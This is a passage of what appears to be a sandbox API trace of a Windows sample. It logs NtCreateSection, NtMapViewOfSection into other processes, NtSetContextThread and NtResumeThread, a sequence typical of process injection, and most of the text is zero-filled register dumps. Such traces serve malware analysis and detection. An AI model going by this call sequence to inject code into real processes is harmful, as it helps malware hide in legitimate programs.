AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.745] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x1a7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x1a8000) returned 0x0 [0167.768] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x1a7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x29c0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x1a8000) returned 0x0 [0167.852] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0167.871] NtClose (Handle=0x140) returned 0x0 [0167.871] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x258000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2ad4707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.876] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0167.876] NtClose (Handle=0xb4) returned 0x0 [0167.876] NtClose (Handle=0x138) returned 0x0 [0167.882] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xadc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0167.882] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0167.882] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0167.883] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x378000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0167.883] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0167.885] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xda8) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0167.886] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0167.886] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x23e0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.896] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x378000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.900] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.900] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x144200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x145000) returned 0x0 [0167.913] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x144200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2220000, SectionOffset=0x0, ViewSize=0xde6e8*=0x145000) returned 0x0 [0168.018] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0168.034] NtClose (Handle=0x140) returned 0x0 [0168.035] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x378000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x22d1707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, 